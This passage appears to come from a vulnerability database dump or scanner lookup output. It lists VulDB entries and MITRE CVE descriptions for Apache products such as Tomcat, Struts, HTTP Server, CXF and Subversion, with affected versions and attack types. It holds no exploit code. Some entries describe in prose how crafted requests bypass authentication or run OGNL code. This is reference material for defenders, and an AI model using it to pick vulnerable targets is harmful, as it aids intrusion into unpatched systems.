5830| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
5831| [8427] Apache Tomcat Session Transaction weak authentication
5832| [63960] Apache Maven 3.0.4 Default Configuration spoofing
5833| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
5834| [63750] Apache qpid up to 0.20 checkAvailable denial of service
5835| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
5836| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
5837| [63747] Apache Rave up to 0.20 User Account information disclosure
5838| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
5839| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
5840| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
5841| [7687] Apache CXF up to 2.7.2 Token weak authentication
5842| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
5843| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
5844| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
5845| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
5846| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
5847| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
5848| [63090] Apache Tomcat up to 4.1.24 denial of service
5849| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
5850| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
5851| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
5852| [62833] Apache CXF -/2.6.0 spoofing
5853| [62832] Apache Axis2 up to 1.6.2 spoofing
5854| [62831] Apache Axis up to 1.4 Java Message Service spoofing
5855| [62830] Apache Commons-httpclient 3.0 Payments spoofing
5856| [62826] Apache Libcloud up to 0.11.0 spoofing
5857| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
5858| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
5859| [62661] Apache Axis2 unknown vulnerability
5860| [62658] Apache Axis2 unknown vulnerability
5861| [62467] Apache Qpid up to 0.17 denial of service
5862| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
5863| [6301] Apache HTTP Server mod_pagespeed cross site scripting
5864| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
5865| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
5866| [62035] Apache Struts up to 2.3.4 denial of service
5867| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
5868| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
5869| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
5870| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
5871| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
5872| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
5873| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
5874| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
5875| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
5876| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
5877| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
5878| [61229] Apache Sling up to 2.1.1 denial of service
5879| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
5880| [61094] Apache Roller up to 5.0 cross site scripting
5881| [61093] Apache Roller up to 5.0 cross site request forgery
5882| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
5883| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
5884| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
5885| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
5886| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
5887| [60708] Apache Qpid 0.12 unknown vulnerability
5888| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
5889| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
5890| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
5891| [4882] Apache Wicket up to 1.5.4 directory traversal
5892| [4881] Apache Wicket up to 1.4.19 cross site scripting
5893| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
5894| [60352] Apache Struts up to 2.2.3 memory corruption
5895| [60153] Apache Portable Runtime up to 1.4.3 denial of service
5896| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
5897| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
5898| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
5899| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
5900| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
5901| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
5902| [4571] Apache Struts up to 2.3.1.2 privilege escalation
5903| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
5904| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
5905| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
5906| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
5907| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
5908| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
5909| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
5910| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
5911| [59888] Apache Tomcat up to 6.0.6 denial of service
5912| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
5913| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
5914| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
5915| [59850] Apache Geronimo up to 2.2.1 denial of service
5916| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
5917| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
5918| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
5919| [58413] Apache Tomcat up to 6.0.10 spoofing
5920| [58381] Apache Wicket up to 1.4.17 cross site scripting
5921| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
5922| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
5923| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
5924| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
5925| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
5926| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
5927| [57568] Apache Archiva up to 1.3.4 cross site scripting
5928| [57567] Apache Archiva up to 1.3.4 cross site request forgery
5929| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
5930| [4355] Apache HTTP Server APR apr_fnmatch denial of service
5931| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
5932| [57425] Apache Struts up to 2.2.1.1 cross site scripting
5933| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
5934| [57025] Apache Tomcat up to 7.0.11 information disclosure
5935| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
5936| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
5937| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
5938| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
5939| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
5940| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
5941| [56512] Apache Continuum up to 1.4.0 cross site scripting
5942| [4285] Apache Tomcat 5.x JVM getLocale denial of service
5943| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
5944| [4283] Apache Tomcat 5.x ServletContect privilege escalation
5945| [56441] Apache Tomcat up to 7.0.6 denial of service
5946| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
5947| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
5948| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
5949| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
5950| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
5951| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
5952| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
5953| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
5954| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
5955| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
5956| [54693] Apache Traffic Server DNS Cache unknown vulnerability
5957| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
5958| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
5959| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
5960| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
5961| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
5962| [54012] Apache Tomcat up to 6.0.10 denial of service
5963| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
5964| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
5965| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
5966| [52894] Apache Tomcat up to 6.0.7 information disclosure
5967| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
5968| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
5969| [52786] Apache Open For Business Project up to 09.04 cross site scripting
5970| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
5971| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
5972| [52584] Apache CouchDB up to 0.10.1 information disclosure
5973| [51757] Apache HTTP Server 2.0.44 cross site scripting
5974| [51756] Apache HTTP Server 2.0.44 spoofing
5975| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
5976| [51690] Apache Tomcat up to 6.0 directory traversal
5977| [51689] Apache Tomcat up to 6.0 information disclosure
5978| [51688] Apache Tomcat up to 6.0 directory traversal
5979| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
5980| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
5981| [50626] Apache Solr 1.0.0 cross site scripting
5982| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
5983| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
5984| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
5985| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
5986| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
5987| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
5988| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
5989| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
5990| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
5991| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
5992| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
5993| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
5994| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
5995| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
5996| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
5997| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
5998| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
5999| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
6000| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
6001| [47214] Apachefriends xampp 1.6.8 spoofing
6002| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
6003| [47162] Apachefriends XAMPP 1.4.4 weak authentication
6004| [47065] Apache Tomcat 4.1.23 cross site scripting
6005| [46834] Apache Tomcat up to 5.5.20 cross site scripting
6006| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
6007| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
6008| [86625] Apache Struts directory traversal
6009| [44461] Apache Tomcat up to 5.5.0 information disclosure
6010| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
6011| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
6012| [43663] Apache Tomcat up to 6.0.16 directory traversal
6013| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
6014| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
6015| [43516] Apache Tomcat up to 4.1.20 directory traversal
6016| [43509] Apache Tomcat up to 6.0.13 cross site scripting
6017| [42637] Apache Tomcat up to 6.0.16 cross site scripting
6018| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
6019| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
6020| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
6021| [40924] Apache Tomcat up to 6.0.15 information disclosure
6022| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
6023| [40922] Apache Tomcat up to 6.0 information disclosure
6024| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
6025| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
6026| [40656] Apache Tomcat 5.5.20 information disclosure
6027| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
6028| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
6029| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
6030| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
6031| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
6032| [40234] Apache Tomcat up to 6.0.15 directory traversal
6033| [40221] Apache HTTP Server 2.2.6 information disclosure
6034| [40027] David Castro Apache Authcas 0.4 sql injection
6035| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
6036| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
6037| [3414] Apache Tomcat WebDAV Stored privilege escalation
6038| [39489] Apache Jakarta Slide up to 2.1 directory traversal
6039| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
6040| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
6041| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
6042| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
6043| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
6044| [38524] Apache Geronimo 2.0 unknown vulnerability
6045| [3256] Apache Tomcat up to 6.0.13 cross site scripting
6046| [38331] Apache Tomcat 4.1.24 information disclosure
6047| [38330] Apache Tomcat 4.1.24 information disclosure
6048| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
6049| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
6050| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
6051| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
6052| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
6053| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
6054| [37292] Apache Tomcat up to 5.5.1 cross site scripting
6055| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
6056| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
6057| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
6058| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
6059| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
6060| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
6061| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
6062| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
6063| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
6064| [36225] XAMPP Apache Distribution 1.6.0a sql injection
6065| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
6066| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
6067| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
6068| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
6069| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
6070| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
6071| [34252] Apache HTTP Server denial of service
6072| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
6073| [33877] Apache Opentaps 0.9.3 cross site scripting
6074| [33876] Apache Open For Business Project unknown vulnerability
6075| [33875] Apache Open For Business Project cross site scripting
6076| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
6077| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
6078|
6079| MITRE CVE - https://cve.mitre.org:
6080| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
6081| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
6082| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
6083| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
6084| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
6085| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
6086| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
6087| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
6088| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
6089| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
6090| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
6091| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
6092| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
6093| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
6094| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
6095| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
6096| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
6097| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
6098| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
6099| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
6100| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
6101| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
6102| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
6103| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
6104| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
6105| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
6106| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
6107| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
6108| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
6109| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
6110| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
6111| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
6112| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
6113| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
6114| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
6115| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
6116| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
6117| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
6118| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
6119| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
6120| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
6121| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
6122| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
6123| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
6124| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
6125| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
